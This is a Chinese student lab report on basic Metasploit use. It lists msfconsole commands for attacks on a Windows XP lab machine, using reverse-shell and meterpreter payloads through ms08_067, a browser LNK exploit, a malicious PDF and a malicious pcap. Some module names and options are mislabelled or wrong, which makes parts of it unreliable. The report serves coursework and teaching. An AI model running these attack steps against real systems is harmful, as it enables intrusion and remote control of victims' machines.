• 2019-2020-2 网络对抗技术 20175205 Exp6 MSF基础应用


    2019-2020-2 网络对抗技术 20175205 Exp6 MSF基础应用

    原理与实践说明

    实践原理

    1、 MSF主要模块:指Metasploit框架中所使用的一段软件代码组件

    • 查看六种模块源码目录/usr/share/metasploit-framework/modules
    • 渗透攻击模块(Exploit Modules)
      • 攻击漏洞,把shellcode"背"过去
      • 针对每一个漏洞,写一段攻击代码
    • 辅助模块(Auxiliary Modules)
      • 在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
    • 攻击载荷(Payload Modules)
      • 载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
    • 空字段模块(Payload Modules)
    • 编码模块(Payload Modules)
    • 后渗透攻击模块(Payload Modules)

    2、 用户操作界面

    • msfconsole
      • 开发部署成本低、兼容性高、方便自动化
      • 指令需要记
    • armitage
      • 点选模块 不用记忆
      • 使用不灵活
    • webgui
      • 跨平台 高效 功能强大

    3、 MSF常用漏洞指令

    • search name:用指定关键字搜索可以利用的漏洞模块
    • use exploit name:使用漏洞
    • show options:显示配置选项
    • set option name option:设置选项
    • show payloads:回链攻击载荷
    • show targets: 显示目标(os版本)
    • set TARGET target number:设置目标版本
    • exploit:开始漏洞攻击
    • sessions -l:列出会话
    • sessions -i id:选择会话
    • sessions -k id:结束会话
    • Ctrl+z:把会话放到后台
    • Ctrl+c:结束会话
    • show auxiliary:显示辅助模块
    • use auxiliary name:使用辅助模块
    • set option name option:设置选项
    • exploit:运行模块

    基础问题回答

    Q:用自己的话解释什么是exploit,payload,encode.

    • exploit是工具,用来连接漏洞,将payload传送到靶机中
    • payload是载荷,是目标系统在被exploit传送之后,去执行的攻击代码
    • encode是编码,用来包装payload,不让杀软轻易发现payload就是攻击代码

    实验内容

    任务一:主动攻击实践

    如ms08_067

    ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限。

    • 实现:ms08_067

    • 攻击机:Kali 192.168.62.21

    • 靶机:Windows xp sp3 192.168.62.31

    • payload : generic/shell_reverse_tcp

    • 测试靶机与攻击机之间能否ping通

    • 攻击者试探靶机是否存在此漏洞nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.62.31

      • 查看到靶机的版本号

      • 查看到靶机存在此漏洞

    • msfconsole打开控制台

    • search ms08-067查看漏洞位置

    • use exploit/windows/smb/ms08_067_netapi选择该漏洞

    • set payload generic/shell_reverse_tcp设置攻击的载荷

    • set RHOSTS 192.168.62.31设置靶机IP

    • set LHOSTS 192.168.62.21设置攻击机IP

    • exploit进行攻击

    • 验证连接结果,例如ipconfig /all命令

    ms17-010

    • 实现:ms17-010

    • 攻击机:kali 192.168.62.21

    • 靶机:Windows xp sp3 192.168.62.31

    • payload: generic/shell_reverse_tcp

    • 攻击机使用nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.62.31探测靶机是否存在该漏洞

    • search ms17-010 查看漏洞的渗透模块

    • use exploit/windows/smb/ms07_029_msdns_zonename 进入该模块

    • show payloads 显示有效的攻击载荷

    • set payload generic/shell_reverse_tcp设置攻击的载荷

    • set RHOST 192.168.62.31设置靶机IP

    • set LHOST 192.168.62.21设置攻击机IP

    • exploit 进行攻击

    • 在用ms17-010攻击时,会出现靶机自动重启的状况,然后就会提示失败,无法成功获取靶机权限,我猜有可能是漏洞被修复了叭~

    任务二:一个针对浏览器的攻击

    • 实现:ms10-018

    • 攻击机:kali 192.168.62.21

    • 靶机:Windows xp sp3 192.168.62.31

    • payload: windows/meterpreter/reverse_tcp

    • 首先查看浏览器漏洞: cd /usr/share/metasploit-framework/modules/exploits/windows/browser

    • 输入ls即可看到很多漏洞代码,选择 ms10_046_shortcut_icon_dllloader.rb

    • 进入控制台: msfconsole ,使用: use windows/browser/ms10_046_shortcut_icon_dllloader

    • 查看一下这个漏洞的作用: info

    • 此模块利用处理Windows快捷方式文件(.LNK)时的漏洞,其中包含指向恶意DLL。此模块创建可以使用的WebDAV服务,当以UNC路径访问时,可以运行任意负载。

    	show payloads      //显示可用攻击载荷
    	set payload windows/meterpreter/reverse_tcp   //选择攻击载荷
    	set LHOST 192.168.62.31     //设置监听地址
    	exploit     //进行攻击
    
    • 在靶机用浏览器打开生成的链接:http://192.168.62.21:80/

    • 查看会话: sessions

    • 选取会话: session -i 1

    任务三:一个针对客户端的攻击

    • 实现:Adobe

    • 攻击机:kali 192.168.62.21

    • 靶机:Windows xp sp3 192.168.62.31

    • 使用:search adobe查找Adobe漏洞

    • 使用:use windows/fileformat/adobe_cooltype_sing使用漏洞

    • payload: windows/meterpreter/reverse_tcp

    • 设置相关参数

    	set LHOST 192.168.62.21  //攻击者地址
    	set FILENAME 20175205Hy.pdf   //设置生成pdf文件的文件名
    	exploit   //攻击
    
    • 将生成的文件复制之后导入靶机中:cp /root/.msf4/local/20175205Hy.pdf 20175205Hy.pdf
    • 在靶机中使用双击打开20175205Hy.pdf,攻击成功

    任务四:成功应用任何一个辅助模块

    • 实现:MS12-020(CVE-2012-0002)蓝屏攻击

    • 攻击机:kali 192.168.62.21

    • 靶机:Windows xp sp3 192.168.62.32

    • payload : windows/meterpreter/reverse_tcp

    • 使用:msfconsole进入控制台

    • 使用:use exploit/windows/fileformat/wireshark_packet_dect.rb,使用漏洞

    • 使用:info,查看漏洞具体信息(重点当然是description)

    • 使用:set payload windows/meterpreter/reverse_tcp选择攻击载荷

    • 设置相关参数

    	set LHOST 192.168.62.21 //攻击者地址
    	set LPORT 5205 //设置端口号
    	set FILENAME 5205.pcap //设置文件名
    	show options //查看设置
    	exploit //攻击
    

    • 将生成的5205.pcap复制到Windows XP中
    • kail中输入back退出当前模块,进入监听模块
    	use exploit/multi/handler //进入监听模块
    	set payload windows/meterpreter/reverse_tcp  //选择攻击载荷
    	set LHOST 192.168.62.21 //攻击者地址
    	set LPORT 5205 //设置端口号
    	exploit //攻击
    
    • 在靶机中使用wireshark打开5205.pcap

    实验感想

    • 本次实验内容较简单,把一些看似没有关联的知识点连接起来,巩固了自己的知识体系。
    • 但是叭,这个环境也太难了,得找到合适靶机才能实验成功,这也体现了metasploit攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。
    • 但是离真正时间还有一定距离,很多都是在特殊环境下执行的,对靶机要求很高,不具有灵活性。
  • 相关阅读:
    文件夹生成zip
    html 字符串 生成 pdf 完美解决中文不显示
    layui 数据表格+分页+搜索+checkbox+缓存选中项数据
    排序算法总结
    排序算法(10)--Distribution Sorting--分布排序[2]--Radix Sort--基数排序
    排序算法(8)--Merge Sorting--归并排序--Merge sort--归并排序
    [Android]在Dagger 2中使用RxJava来进行异步注入(翻译)
    [Android]使用Dagger 2进行依赖注入
    [Android]Android端ORM框架——RapidORM(v2.1)
    [Android]使用MVP解决技术债务(翻译)
  • 原文地址:https://www.cnblogs.com/orii/p/12790336.html
Copyright © 2020-2023  润新知